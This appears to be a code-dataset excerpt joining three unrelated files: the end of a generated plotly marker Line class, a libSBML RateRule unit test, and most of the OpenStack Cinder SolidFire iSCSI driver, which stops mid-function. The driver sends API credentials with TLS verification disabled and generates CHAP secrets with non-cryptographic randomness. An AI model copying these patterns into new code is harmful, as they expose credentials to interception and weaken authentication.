Sets the source reference on Chart Studio Cloud for
            `color`.
reversescale
Reverses the color mapping if true. Has an effect only
            if `marker.line.color` is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
widthsrc
Sets the source reference on Chart Studio Cloud for
            `width`.
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.splom.marker.Line
constructor must be a dict or
an instance of :class:`plotly.graph_objs.splom.marker.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autocolorscale", None)
_v = autocolorscale if autocolorscale is not None else _v
if _v is not None:
self["autocolorscale"] = _v
_v = arg.pop("cauto", None)
_v = cauto if cauto is not None else _v
if _v is not None:
self["cauto"] = _v
_v = arg.pop("cmax", None)
_v = cmax if cmax is not None else _v
if _v is not None:
self["cmax"] = _v
_v = arg.pop("cmid", None)
_v = cmid if cmid is not None else _v
if _v is not None:
self["cmid"] = _v
_v = arg.pop("cmin", None)
_v = cmin if cmin is not None else _v
if _v is not None:
self["cmin"] = _v
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("coloraxis", None)
_v = coloraxis if coloraxis is not None else _v
if _v is not None:
self["coloraxis"] = _v
_v = arg.pop("colorscale", None)
_v = colorscale if colorscale is not None else _v
if _v is not None:
self["colorscale"] = _v
_v = arg.pop("colorsrc", None)
_v = colorsrc if colorsrc is not None else _v
if _v is not None:
self["colorsrc"] = _v
_v = arg.pop("reversescale", None)
_v = reversescale if reversescale is not None else _v
if _v is not None:
self["reversescale"] = _v
_v = arg.pop("width", None)
_v = width if width is not None else _v
if _v is not None:
self["width"] = _v
_v = arg.pop("widthsrc", None)
_v = widthsrc if widthsrc is not None else _v
if _v is not None:
self["widthsrc"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
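# Editorial usage sketch (hedged, not part of the generated plotly module):
# constructing this Line through the public API; the attribute path and values
# are illustrative, it assumes a working plotly installation, and it only runs
# when this file is executed directly.
if __name__ == "__main__":
    import plotly.graph_objects as go
    demo_line = go.splom.marker.Line(color="royalblue", width=1.5,
                                     reversescale=False)
    print(demo_line.to_plotly_json())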
|
mit
| -8,391,715,932,195,973,000 | 36.842185 | 87 | 0.565322 | false |
alexholehouse/SBMLIntegrator
|
libsbml-5.0.0/src/bindings/python/test/sbml/TestRateRule.py
|
1
|
3765
|
#
# @file TestRateRule.py
# @brief RateRule unit tests
#
# @author Akiya Jouraku (Python conversion)
# @author Ben Bornstein
#
# $Id$
# $HeadURL$
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestRateRule.c
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
import sys
import unittest
import libsbml
class TestRateRule(unittest.TestCase):
global RR
RR = None
def setUp(self):
self.RR = libsbml.RateRule(1,2)
if (self.RR == None):
pass
pass
def tearDown(self):
_dummyList = [ self.RR ]; _dummyList[:] = []; del _dummyList
pass
def test_RateRule_create(self):
self.assert_( self.RR.getTypeCode() == libsbml.SBML_RATE_RULE )
self.assert_( self.RR.getMetaId() == "" )
self.assert_( self.RR.getNotes() == None )
self.assert_( self.RR.getAnnotation() == None )
self.assert_( self.RR.getFormula() == "" )
self.assert_( self.RR.getMath() == None )
self.assert_( self.RR.getVariable() == "" )
self.assert_( self.RR.getType() == libsbml.RULE_TYPE_RATE )
pass
def test_RateRule_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(2,1)
sbmlns.addNamespaces(xmlns)
object = libsbml.RateRule(sbmlns)
self.assert_( object.getTypeCode() == libsbml.SBML_RATE_RULE )
self.assert_( object.getMetaId() == "" )
self.assert_( object.getNotes() == None )
self.assert_( object.getAnnotation() == None )
self.assert_( object.getLevel() == 2 )
self.assert_( object.getVersion() == 1 )
self.assert_( object.getNamespaces() != None )
self.assert_( object.getNamespaces().getLength() == 2 )
_dummyList = [ object ]; _dummyList[:] = []; del _dummyList
pass
def test_RateRule_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_RateRule_setVariable(self):
variable = "x";
self.RR.setVariable(variable)
self.assert_(( variable == self.RR.getVariable() ))
self.assertEqual( True, self.RR.isSetVariable() )
if (self.RR.getVariable() == variable):
pass
self.RR.setVariable(self.RR.getVariable())
self.assert_(( variable == self.RR.getVariable() ))
self.RR.setVariable("")
self.assertEqual( False, self.RR.isSetVariable() )
if (self.RR.getVariable() != None):
pass
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestRateRule))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
|
gpl-3.0
| 2,724,558,399,042,802,700 | 32.616071 | 79 | 0.635591 | false |
petrutlucian94/cinder
|
cinder/volume/drivers/solidfire.py
|
1
|
52455
|
# All Rights Reserved.
# Copyright 2013 SolidFire Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import math
import random
import socket
import string
import time
import warnings
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from oslo_utils import timeutils
from oslo_utils import units
import requests
from requests.packages.urllib3 import exceptions
import six
from cinder import context
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.image import image_utils
from cinder.volume.drivers.san import san
from cinder.volume import qos_specs
from cinder.volume.targets import iscsi as iscsi_driver
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
sf_opts = [
cfg.BoolOpt('sf_emulate_512',
default=True,
help='Set 512 byte emulation on volume creation; '),
cfg.BoolOpt('sf_allow_tenant_qos',
default=False,
help='Allow tenants to specify QOS on create'),
cfg.StrOpt('sf_account_prefix',
default=None,
help='Create SolidFire accounts with this prefix. Any string '
'can be used here, but the string \"hostname\" is special '
'and will create a prefix using the cinder node hostname '
'(previous default behavior). The default is NO prefix.'),
cfg.StrOpt('sf_template_account_name',
default='openstack-vtemplate',
help='Account name on the SolidFire Cluster to use as owner of '
'template/cache volumes (created if does not exist).'),
cfg.BoolOpt('sf_allow_template_caching',
default=True,
help='Create an internal cache of copy of images when '
'a bootable volume is created to eliminate fetch from '
'glance and qemu-conversion on subsequent calls.'),
cfg.IntOpt('sf_api_port',
default=443,
help='SolidFire API port. Useful if the device api is behind '
'a proxy on a different port.')]
CONF = cfg.CONF
CONF.register_opts(sf_opts)
def retry(exc_tuple, tries=5, delay=1, backoff=2):
def retry_dec(f):
@six.wraps(f)
def func_retry(*args, **kwargs):
_tries, _delay = tries, delay
while _tries > 1:
try:
return f(*args, **kwargs)
except exc_tuple:
time.sleep(_delay)
_tries -= 1
_delay *= backoff
LOG.debug('Retrying %(args)s, %(tries)s attempts '
'remaining...',
{'args': args, 'tries': _tries})
# NOTE(jdg): Don't log the params passed here
# some cmds like createAccount will have sensitive
# info in the params, grab only the second tuple
# which should be the Method
msg = (_('Retry count exceeded for command: %s') %
(args[1],))
LOG.error(msg)
raise exception.SolidFireAPIException(message=msg)
return func_retry
return retry_dec
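# Editorial note (hedged): a minimal sketch of applying the retry decorator
# above; the exception tuple and function below are illustrative. The real
# usage in this driver is the @retry(...) on _issue_api_request.
#
#   @retry((requests.exceptions.ConnectionError,), tries=3, delay=1, backoff=2)
#   def fragile_call():
#       ...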
class SolidFireDriver(san.SanISCSIDriver):
"""OpenStack driver to enable SolidFire cluster.
Version history:
1.0 - Initial driver
1.1 - Refactor, clone support, qos by type and minor bug fixes
1.2 - Add xfr and retype support
1.2.1 - Add export/import support
1.2.2 - Catch VolumeNotFound on accept xfr
2.0.0 - Move from httplib to requests
2.0.1 - Implement SolidFire Snapshots
2.0.2 - Implement secondary account
"""
VERSION = '2.0.2'
sf_qos_dict = {'slow': {'minIOPS': 100,
'maxIOPS': 200,
'burstIOPS': 200},
'medium': {'minIOPS': 200,
'maxIOPS': 400,
'burstIOPS': 400},
'fast': {'minIOPS': 500,
'maxIOPS': 1000,
'burstIOPS': 1000},
'performant': {'minIOPS': 2000,
'maxIOPS': 4000,
'burstIOPS': 4000},
'off': None}
sf_qos_keys = ['minIOPS', 'maxIOPS', 'burstIOPS']
cluster_stats = {}
retry_exc_tuple = (exception.SolidFireRetryableException,
requests.exceptions.ConnectionError)
retryable_errors = ['xDBVersionMismatch',
'xMaxSnapshotsPerVolumeExceeded',
'xMaxClonesPerVolumeExceeded',
'xMaxSnapshotsPerNodeExceeded',
'xMaxClonesPerNodeExceeded',
'xNotReadyForIO']
def __init__(self, *args, **kwargs):
super(SolidFireDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(sf_opts)
self._endpoint = self._build_endpoint_info()
self.template_account_id = None
self.max_volumes_per_account = 1990
try:
self._update_cluster_status()
except exception.SolidFireAPIException:
pass
if self.configuration.sf_allow_template_caching:
account = self.configuration.sf_template_account_name
self.template_account_id = self._create_template_account(account)
self.target_driver = (
importutils.import_object(
'cinder.volume.drivers.solidfire.SolidFireISCSI',
solidfire_driver=self,
configuration=self.configuration))
def _create_template_account(self, account_name):
# We raise an API exception if the account doesn't exist
# We need to take account_prefix settings into consideration
# This just uses the same method to do template account create
# as we use for any other OpenStack account
account_name = self._get_sf_account_name(account_name)
try:
id = self._issue_api_request(
'GetAccountByName',
{'username': account_name})['result']['account']['accountID']
except exception.SolidFireAPIException:
chap_secret = self._generate_random_string(12)
params = {'username': account_name,
'initiatorSecret': chap_secret,
'targetSecret': chap_secret,
'attributes': {}}
id = self._issue_api_request('AddAccount',
params)['result']['accountID']
return id
def _build_endpoint_info(self, **kwargs):
endpoint = {}
endpoint['mvip'] = (
kwargs.get('mvip', self.configuration.san_ip))
endpoint['login'] = (
kwargs.get('login', self.configuration.san_login))
endpoint['passwd'] = (
kwargs.get('passwd', self.configuration.san_password))
endpoint['port'] = (
kwargs.get('port', self.configuration.sf_api_port))
endpoint['url'] = 'https://%s:%s' % (endpoint['mvip'],
endpoint['port'])
# TODO(jdg): consider a call to GetAPI and setting version
return endpoint
@retry(retry_exc_tuple, tries=6)
def _issue_api_request(self, method, params, version='1.0', endpoint=None):
if params is None:
params = {}
if endpoint is None:
endpoint = self._endpoint
payload = {'method': method, 'params': params}
url = '%s/json-rpc/%s/' % (endpoint['url'], version)
with warnings.catch_warnings():
warnings.simplefilter("ignore", exceptions.InsecureRequestWarning)
req = requests.post(url,
data=json.dumps(payload),
auth=(endpoint['login'], endpoint['passwd']),
verify=False,
timeout=30)
response = req.json()
req.close()
if (('error' in response) and
(response['error']['name'] in self.retryable_errors)):
msg = ('Retryable error (%s) encountered during '
'SolidFire API call.' % response['error']['name'])
LOG.debug(msg)
raise exception.SolidFireRetryableException(message=msg)
if 'error' in response:
msg = _('API response: %s') % response
raise exception.SolidFireAPIException(msg)
return response
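    # Editorial note (hedged): _issue_api_request above posts a JSON-RPC
    # payload of the form below to https://<mvip>:<port>/json-rpc/<version>/
    # using HTTP basic auth; the method and params are illustrative only.
    #   {"method": "GetClusterInfo", "params": {}}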
def _get_volumes_by_sfaccount(self, account_id):
"""Get all volumes on cluster for specified account."""
params = {'accountID': account_id}
data = self._issue_api_request('ListVolumesForAccount', params)
if 'result' in data:
return data['result']['volumes']
def _get_sfaccount_by_name(self, sf_account_name):
"""Get SolidFire account object by name."""
sfaccount = None
params = {'username': sf_account_name}
try:
data = self._issue_api_request('GetAccountByName', params)
if 'result' in data and 'account' in data['result']:
LOG.debug('Found solidfire account: %s', sf_account_name)
sfaccount = data['result']['account']
except exception.SolidFireAPIException as ex:
if 'xUnknownAccount' in ex.msg:
return sfaccount
else:
raise
return sfaccount
def _get_sf_account_name(self, project_id):
"""Build the SolidFire account name to use."""
prefix = self.configuration.sf_account_prefix or ''
if prefix == 'hostname':
prefix = socket.gethostname()
return '%s%s%s' % (prefix, '-' if prefix else '', project_id)
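    # Editorial note (hedged): illustrative results of the formula above for a
    # project_id of "abc123":
    #   sf_account_prefix unset      -> "abc123"
    #   sf_account_prefix "cinder"   -> "cinder-abc123"
    #   sf_account_prefix "hostname" -> "<socket.gethostname()>-abc123"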
def _get_sfaccount(self, project_id):
sf_account_name = self._get_sf_account_name(project_id)
sfaccount = self._get_sfaccount_by_name(sf_account_name)
if sfaccount is None:
raise exception.SolidFireAccountNotFound(
account_name=sf_account_name)
return sfaccount
def _create_sfaccount(self, project_id):
"""Create account on SolidFire device if it doesn't already exist.
We're first going to check if the account already exists, if it does
just return it. If not, then create it.
"""
sf_account_name = self._get_sf_account_name(project_id)
sfaccount = self._get_sfaccount_by_name(sf_account_name)
if sfaccount is None:
LOG.debug('solidfire account: %s does not exist, create it...',
sf_account_name)
chap_secret = self._generate_random_string(12)
params = {'username': sf_account_name,
'initiatorSecret': chap_secret,
'targetSecret': chap_secret,
'attributes': {}}
data = self._issue_api_request('AddAccount', params)
if 'result' in data:
sfaccount = self._get_sfaccount_by_name(sf_account_name)
return sfaccount
def _get_cluster_info(self):
"""Query the SolidFire cluster for some property info."""
params = {}
data = self._issue_api_request('GetClusterInfo', params)
if 'result' not in data:
msg = _("API response: %s") % data
raise exception.SolidFireAPIException(msg)
return data['result']
def _generate_random_string(self, length):
"""Generates random_string to use for CHAP password."""
char_set = string.ascii_uppercase + string.digits
return ''.join(random.sample(char_set, length))
def _get_model_info(self, sfaccount, sf_volume_id):
"""Gets the connection info for specified account and volume."""
cluster_info = self._get_cluster_info()
iscsi_portal = cluster_info['clusterInfo']['svip'] + ':3260'
chap_secret = sfaccount['targetSecret']
found_volume = False
iteration_count = 0
while not found_volume and iteration_count < 600:
volume_list = self._get_volumes_by_sfaccount(
sfaccount['accountID'])
iqn = None
for v in volume_list:
if v['volumeID'] == sf_volume_id:
iqn = v['iqn']
found_volume = True
break
if not found_volume:
time.sleep(2)
iteration_count += 1
if not found_volume:
LOG.error(_LE('Failed to retrieve volume SolidFire-'
'ID: %s in get_by_account!'), sf_volume_id)
raise exception.VolumeNotFound(volume_id=sf_volume_id)
model_update = {}
# NOTE(john-griffith): SF volumes are always at lun 0
model_update['provider_location'] = ('%s %s %s'
% (iscsi_portal, iqn, 0))
model_update['provider_auth'] = ('CHAP %s %s'
% (sfaccount['username'],
chap_secret))
if not self.configuration.sf_emulate_512:
model_update['provider_geometry'] = ('%s %s' % (4096, 4096))
model_update['provider_id'] = ('%s' % sf_volume_id)
return model_update
def _do_clone_volume(self, src_uuid,
src_project_id,
vref):
"""Create a clone of an existing volume or snapshot."""
attributes = {}
qos = {}
sf_accounts = self._get_sfaccounts_for_tenant(vref['project_id'])
if not sf_accounts:
sf_account = self._create_sfaccount(vref['project_id'])
else:
# Check availability for creates
sf_account = self._get_account_create_availability(sf_accounts)
if not sf_account:
# TODO(jdg): We're not doing tertiaries, so fail
msg = _('volumes/account exceeded on both primary '
'and secondary SolidFire accounts')
raise exception.SolidFireDriverException(msg)
params = {'name': 'UUID-%s' % vref['id'],
'newAccountID': sf_account['accountID']}
# NOTE(jdg): First check the SF snapshots
# if we don't find a snap by the given name, just move on to check
# volumes. This may be a running system that was updated from
# before we did snapshots, so need to check both
is_clone = False
snap_name = 'UUID-%s' % src_uuid
snaps = self._get_sf_snapshots()
snap = next((s for s in snaps if s["name"] == snap_name), None)
if snap:
params['snapshotID'] = int(snap['snapshotID'])
params['volumeID'] = int(snap['volumeID'])
params['newSize'] = int(vref['size'] * units.Gi)
else:
sf_vol = self._get_sf_volume(
src_uuid, {'accountID': sf_account['accountID']})
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=src_uuid)
params['volumeID'] = int(sf_vol['volumeID'])
params['newSize'] = int(vref['size'] * units.Gi)
is_clone = True
data = self._issue_api_request('CloneVolume', params, version='6.0')
if (('result' not in data) or ('volumeID' not in data['result'])):
msg = _("API response: %s") % data
raise exception.SolidFireAPIException(msg)
sf_volume_id = data['result']['volumeID']
if (self.configuration.sf_allow_tenant_qos and
                vref.get('volume_metadata') is not None):
qos = self._set_qos_presets(vref)
ctxt = context.get_admin_context()
type_id = vref.get('volume_type_id', None)
if type_id is not None:
qos = self._set_qos_by_volume_type(ctxt, type_id)
# NOTE(jdg): all attributes are copied via clone, need to do an update
# to set any that were provided
params = {'volumeID': sf_volume_id}
create_time = vref['created_at'].isoformat()
attributes = {'uuid': vref['id'],
'is_clone': 'True',
'src_uuid': src_uuid,
'created_at': create_time}
if qos:
params['qos'] = qos
for k, v in qos.items():
attributes[k] = str(v)
params['attributes'] = attributes
data = self._issue_api_request('ModifyVolume', params)
model_update = self._get_model_info(sf_account, sf_volume_id)
if model_update is None:
mesg = _('Failed to get model update from clone')
raise exception.SolidFireAPIException(mesg)
# Increment the usage count, just for data collection
# We're only doing this for clones, not create_from snaps
if is_clone:
data = self._update_attributes(sf_vol)
return (data, sf_account, model_update)
def _update_attributes(self, sf_vol):
cloned_count = sf_vol['attributes'].get('cloned_count', 0)
cloned_count += 1
attributes = sf_vol['attributes']
attributes['cloned_count'] = cloned_count
params = {'volumeID': int(sf_vol['volumeID'])}
params['attributes'] = attributes
return self._issue_api_request('ModifyVolume', params)
def _do_volume_create(self, sf_account, params):
data = self._issue_api_request('CreateVolume', params)
if (('result' not in data) or ('volumeID' not in data['result'])):
msg = _("Failed volume create: %s") % data
raise exception.SolidFireAPIException(msg)
sf_volume_id = data['result']['volumeID']
return self._get_model_info(sf_account, sf_volume_id)
def _do_snapshot_create(self, params):
data = self._issue_api_request('CreateSnapshot', params, version='6.0')
if (('result' not in data) or ('snapshotID' not in data['result'])):
msg = _("Failed snapshot create: %s") % data
raise exception.SolidFireAPIException(msg)
return data['result']['snapshotID']
def _set_qos_presets(self, volume):
qos = {}
valid_presets = self.sf_qos_dict.keys()
# First look to see if they included a preset
presets = [i.value for i in volume.get('volume_metadata')
if i.key == 'sf-qos' and i.value in valid_presets]
if len(presets) > 0:
if len(presets) > 1:
LOG.warning(_LW('More than one valid preset was '
'detected, using %s'), presets[0])
qos = self.sf_qos_dict[presets[0]]
else:
# look for explicit settings
for i in volume.get('volume_metadata'):
if i.key in self.sf_qos_keys:
qos[i.key] = int(i.value)
return qos
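    # Editorial note (hedged): illustrative mapping performed above. Volume
    # metadata {'sf-qos': 'fast'} resolves to
    # {'minIOPS': 500, 'maxIOPS': 1000, 'burstIOPS': 1000}, while explicit
    # metadata such as {'minIOPS': '300'} is cast to int and used directly.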
def _set_qos_by_volume_type(self, ctxt, type_id):
qos = {}
volume_type = volume_types.get_volume_type(ctxt, type_id)
qos_specs_id = volume_type.get('qos_specs_id')
specs = volume_type.get('extra_specs')
# NOTE(jdg): We prefer the qos_specs association
# and over-ride any existing
# extra-specs settings if present
if qos_specs_id is not None:
kvs = qos_specs.get_qos_specs(ctxt, qos_specs_id)['specs']
else:
kvs = specs
for key, value in kvs.items():
if ':' in key:
fields = key.split(':')
key = fields[1]
if key in self.sf_qos_keys:
qos[key] = int(value)
return qos
def _get_sf_volume(self, uuid, params):
data = self._issue_api_request('ListVolumesForAccount', params)
if 'result' not in data:
msg = _("Failed to get SolidFire Volume: %s") % data
raise exception.SolidFireAPIException(msg)
found_count = 0
sf_volref = None
for v in data['result']['volumes']:
# NOTE(jdg): In the case of "name" we can't
# update that on manage/import, so we use
# the uuid attribute
meta = v.get('attributes')
alt_id = meta.get('uuid', 'empty')
if uuid in v['name'] or uuid in alt_id:
found_count += 1
sf_volref = v
LOG.debug("Mapped SolidFire volumeID %(volume_id)s "
"to cinder ID %(uuid)s.",
{'volume_id': v['volumeID'], 'uuid': uuid})
if found_count == 0:
# NOTE(jdg): Previously we would raise here, but there are cases
# where this might be a cleanup for a failed delete.
# Until we get better states we'll just log an error
LOG.error(_LE("Volume %s, not found on SF Cluster."), uuid)
if found_count > 1:
LOG.error(_LE("Found %(count)s volumes mapped to id: %(uuid)s."),
{'count': found_count,
'uuid': uuid})
raise exception.DuplicateSfVolumeNames(vol_name=uuid)
return sf_volref
def _get_sf_snapshots(self, sf_volid=None):
params = {}
if sf_volid:
params = {'volumeID': sf_volid}
data = self._issue_api_request('ListSnapshots', params, version='6.0')
if 'result' not in data:
msg = _("Failed to get SolidFire Snapshot: %s") % data
raise exception.SolidFireAPIException(msg)
return data['result']['snapshots']
def _create_image_volume(self, context,
image_meta, image_service,
image_id):
# NOTE(jdg): It's callers responsibility to ensure that
# the optional properties.virtual_size is set on the image
# before we get here
virt_size = int(image_meta['properties'].get('virtual_size'))
min_sz_in_bytes = (
math.ceil(virt_size / float(units.Gi)) * float(units.Gi))
min_sz_in_gig = math.ceil(min_sz_in_bytes / float(units.Gi))
attributes = {}
attributes['image_info'] = {}
attributes['image_info']['image_updated_at'] = (
image_meta['updated_at'].isoformat())
attributes['image_info']['image_name'] = (
image_meta['name'])
attributes['image_info']['image_created_at'] = (
image_meta['created_at'].isoformat())
attributes['image_info']['image_id'] = image_meta['id']
params = {'name': 'OpenStackIMG-%s' % image_id,
'accountID': self.template_account_id,
'sliceCount': 1,
'totalSize': int(min_sz_in_bytes),
'enable512e': self.configuration.sf_emulate_512,
'attributes': attributes,
'qos': {}}
sf_account = self._issue_api_request(
'GetAccountByID',
{'accountID': self.template_account_id})
template_vol = self._do_volume_create(sf_account, params)
tvol = {}
tvol['id'] = image_id
tvol['provider_location'] = template_vol['provider_location']
tvol['provider_auth'] = template_vol['provider_auth']
connector = 'na'
conn = self.initialize_connection(tvol, connector)
attach_info = super(SolidFireDriver, self)._connect_device(conn)
properties = 'na'
try:
image_utils.fetch_to_raw(context,
image_service,
image_id,
attach_info['device']['path'],
self.configuration.volume_dd_blocksize,
size=min_sz_in_gig)
except Exception as exc:
params['volumeID'] = template_vol['volumeID']
LOG.error(_LE('Failed image conversion during cache creation: %s'),
exc)
LOG.debug('Removing SolidFire Cache Volume (SF ID): %s',
template_vol['volumeID'])
self._detach_volume(context, attach_info, tvol, properties)
self._issue_api_request('DeleteVolume', params)
return
self._detach_volume(context, attach_info, tvol, properties)
sf_vol = self._get_sf_volume(image_id, params)
LOG.debug('Successfully created SolidFire Image Template '
'for image-id: %s', image_id)
return sf_vol
def _verify_image_volume(self, context, image_meta, image_service):
# This method just verifies that IF we have a cache volume that
# it's still up to date and current WRT the image in Glance
# ie an image-update hasn't occurred since we grabbed it
# If it's out of date, just delete it and we'll create a new one
# Any other case we don't care and just return without doing anything
params = {'accountID': self.template_account_id}
sf_vol = self._get_sf_volume(image_meta['id'], params)
if sf_vol is None:
return
# Check updated_at field, delete copy and update if needed
if sf_vol['attributes']['image_info']['image_updated_at'] == (
image_meta['updated_at'].isoformat()):
return
else:
# Bummer, it's been updated, delete it
params = {'accountID': self.template_account_id}
params['volumeID'] = sf_vol['volumeID']
data = self._issue_api_request('DeleteVolume', params)
if 'result' not in data:
msg = _("Failed to delete SolidFire Image-Volume: %s") % data
raise exception.SolidFireAPIException(msg)
if not self._create_image_volume(context,
image_meta,
image_service,
image_meta['id']):
msg = _("Failed to create SolidFire Image-Volume")
raise exception.SolidFireAPIException(msg)
def _get_sfaccounts_for_tenant(self, cinder_project_id):
data = self._issue_api_request('ListAccounts', {})
if 'result' not in data:
msg = _("API response: %s") % data
raise exception.SolidFireAPIException(msg)
# Note(jdg): On SF we map account-name to OpenStack's tenant ID
# we use tenantID in here to get secondaries that might exist
# Also: we expect this to be sorted, so we get the primary first
# in the list
return sorted([acc for acc in data['result']['accounts'] if
cinder_project_id in acc['username']])
def _get_all_active_volumes(self, cinder_uuid=None):
params = {}
data = self._issue_api_request('ListActiveVolumes',
params)
if 'result' not in data:
msg = _("Failed get active SolidFire volumes: %s") % data
raise exception.SolidFireAPIException(msg)
        if cinder_uuid:
            active_vols = ([v for v in data['result']['volumes'] if
                            cinder_uuid in v['name']])
        else:
            active_vols = [v for v in data['result']['volumes']]
        return active_vols
def _get_all_deleted_volumes(self, cinder_uuid=None):
params = {}
data = self._issue_api_request('ListDeletedVolumes',
params)
if 'result' not in data:
msg = _("Failed get Deleted SolidFire volumes: %s") % data
raise exception.SolidFireAPIException(msg)
if cinder_uuid:
deleted_vols = ([v for v in data['result']['volumes'] if
cinder_uuid in v['name']])
else:
deleted_vols = [v for v in data['result']['volumes']]
return deleted_vols
def _get_account_create_availability(self, accounts):
# we'll check both the primary and the secondary
# if it exists and return whichever one has count
# available.
for acc in accounts:
            if len(self._get_volumes_for_account(
                    acc['accountID'])) < self.max_volumes_per_account:
return acc
if len(accounts) == 1:
sfaccount = self._create_sfaccount(accounts[0]['name'] + '_')
return sfaccount
return None
def _get_volumes_for_account(self, sf_account_id, cinder_uuid=None):
# ListVolumesForAccount gives both Active and Deleted
# we require the solidfire accountID, uuid of volume
# is optional
params = {'accountID': sf_account_id}
response = self._issue_api_request('ListVolumesForAccount',
params)
if cinder_uuid:
vlist = [v for v in response['result']['volumes'] if
cinder_uuid in v['name']]
else:
vlist = [v for v in response['result']['volumes']]
vlist = sorted(vlist, key=lambda k: k['volumeID'])
return vlist
def clone_image(self, context,
volume, image_location,
image_meta, image_service):
# Check out pre-requisites:
# Is template caching enabled?
if not self.configuration.sf_allow_template_caching:
return None, False
# Is the image owned by this tenant or public?
if ((not image_meta.get('is_public', False)) and
(image_meta['owner'] != volume['project_id'])):
LOG.warning(_LW("Requested image is not "
"accessible by current Tenant."))
return None, False
# Is virtual_size property set on the image?
if ((not image_meta.get('properties', None)) or
(not image_meta['properties'].get('virtual_size', None))):
LOG.info(_LI('Unable to create cache volume because image: %s '
'does not include properties.virtual_size'),
image_meta['id'])
return None, False
try:
self._verify_image_volume(context,
image_meta,
image_service)
except exception.SolidFireAPIException:
return None, False
account = self.configuration.sf_template_account_name
try:
(data, sfaccount, model) = self._do_clone_volume(image_meta['id'],
account,
volume)
except exception.VolumeNotFound:
if self._create_image_volume(context,
image_meta,
image_service,
image_meta['id']) is None:
# We failed, dump out
return None, False
# Ok, should be good to go now, try it again
(data, sfaccount, model) = self._do_clone_volume(image_meta['id'],
account,
volume)
return model, True
def create_volume(self, volume):
"""Create volume on SolidFire device.
The account is where CHAP settings are derived from, volume is
created and exported. Note that the new volume is immediately ready
for use.
One caveat here is that an existing user account must be specified
in the API call to create a new volume. We use a set algorithm to
determine account info based on passed in cinder volume object. First
we check to see if the account already exists (and use it), or if it
does not already exist, we'll go ahead and create it.
"""
slice_count = 1
attributes = {}
qos = {}
if (self.configuration.sf_allow_tenant_qos and
                volume.get('volume_metadata') is not None):
qos = self._set_qos_presets(volume)
ctxt = context.get_admin_context()
type_id = volume['volume_type_id']
if type_id is not None:
qos = self._set_qos_by_volume_type(ctxt, type_id)
create_time = volume['created_at'].isoformat()
attributes = {'uuid': volume['id'],
'is_clone': 'False',
'created_at': create_time}
if qos:
for k, v in qos.items():
attributes[k] = str(v)
sf_accounts = self._get_sfaccounts_for_tenant(volume['project_id'])
if not sf_accounts:
sf_account = self._create_sfaccount(volume['project_id'])
else:
sf_account = self._get_account_create_availability(sf_accounts)
params = {'name': 'UUID-%s' % volume['id'],
'accountID': sf_account['accountID'],
'sliceCount': slice_count,
'totalSize': int(volume['size'] * units.Gi),
'enable512e': self.configuration.sf_emulate_512,
'attributes': attributes,
'qos': qos}
# NOTE(jdg): Check if we're a migration tgt, if so
# use the old volume-id here for the SF Name
migration_status = volume.get('migration_status', None)
if migration_status and 'target' in migration_status:
k, v = migration_status.split(':')
params['name'] = 'UUID-%s' % v
params['attributes']['migration_uuid'] = volume['id']
params['attributes']['uuid'] = v
return self._do_volume_create(sf_account, params)
def create_cloned_volume(self, volume, src_vref):
"""Create a clone of an existing volume."""
(_data, _sfaccount, model) = self._do_clone_volume(
src_vref['id'],
src_vref['project_id'],
volume)
return model
def delete_volume(self, volume):
"""Delete SolidFire Volume from device.
        SolidFire allows multiple volumes with the same name;
        volumeID is what's guaranteed unique.
"""
accounts = self._get_sfaccounts_for_tenant(volume['project_id'])
if accounts is None:
LOG.error(_LE("Account for Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"delete_volume operation!"), volume['id'])
LOG.error(_LE("This usually means the volume was never "
"successfully created."))
return
        sf_vol = None
        for acc in accounts:
            vols = self._get_volumes_for_account(acc['accountID'],
                                                 volume['id'])
            sf_vol = vols[0] if vols else None
if sf_vol:
break
if sf_vol is not None:
params = {'volumeID': sf_vol['volumeID']}
